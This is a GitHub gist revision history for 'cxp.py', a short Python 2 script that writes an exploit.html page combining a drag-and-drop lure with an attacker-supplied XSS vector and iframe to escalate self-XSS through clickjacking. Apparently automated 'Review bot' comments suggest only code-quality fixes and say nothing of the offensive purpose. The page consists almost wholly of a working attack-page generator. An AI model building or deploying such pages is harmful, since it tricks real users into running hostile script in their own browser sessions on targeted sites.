@flying0er
Forked from vishwaraj101/cxp.py
Created November 22, 2017 14:02

Revisions

  1. @vishwaraj101 vishwaraj101 revised this gist Apr 13, 2016. No changes.
  2. @vishwaraj101 vishwaraj101 revised this gist Apr 13, 2016. No changes.
  3. @vishwaraj101 vishwaraj101 revised this gist Apr 12, 2016. 1 changed file with 2 additions and 2 deletions.
    4 changes: 2 additions & 2 deletions cxp.py
    @@ -2,15 +2,15 @@
    vector=raw_input('xss vector--> ') #xss payload
    html=raw_input('Custom Iframe Code--> ') #custom iframe code

    fo=open('yahoo.html','w') #creating html file
    fo=open('exploit.html','w') #creating html file

    source_code="""<html><body>
    <h1>Clickjack to exploit self xss </h1>
    <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
    """%(vector)

    fo.write(source_code)
    fo=open('yahoo.html','a')
    fo=open('exploit.html','a')
    fo.write(html)
    fo.write('</body></html>')
    fo.close() #closing the file
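Review bot: The renamed `fo=open('exploit.html','a')` still rebinds `fo` while the handle from `fo=open('exploit.html','w')` is open, so the first handle is never explicitly closed and the `<html><body>` header only reaches disk when that object happens to be finalized. Since both `open` lines are being touched anyway, open the file once inside a `with open('exploit.html','w') as fo:` block, write `source_code`, `html` and the closing tags through that one handle, and drop the second `open` and the manual `fo.close()`. The output name is also still hard-coded in two places; a single variable would keep the next rename from needing two edits.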
  4. @vishwaraj101 vishwaraj101 created this gist Apr 12, 2016.
    17 changes: 17 additions & 0 deletions cxp.py
    @@ -0,0 +1,17 @@
    print "Clickjack to Xss"
    vector=raw_input('xss vector--> ') #xss payload
    html=raw_input('Custom Iframe Code--> ') #custom iframe code

    fo=open('yahoo.html','w') #creating html file

    source_code="""<html><body>
    <h1>Clickjack to exploit self xss </h1>
    <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
    """%(vector)

    fo.write(source_code)
    fo=open('yahoo.html','a')
    fo.write(html)
    fo.write('</body></html>')
    fo.close() #closing the file
    print "file created"
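Review bot: The new file has no docstring or header comment, and the two prompts (`'xss vector--> '` and `'Custom Iframe Code--> '`) do not say what form of input is expected or that the result is written to `yahoo.html` in the current directory, overwriting any existing file of that name. Add a short module docstring that states the purpose and the output path. The script is also Python 2 only: `print "Clickjack to Xss"`, `print "file created"` and both `raw_input` calls fail under Python 3, so either note the interpreter requirement at the top or switch to `print(...)` and `input(...)`.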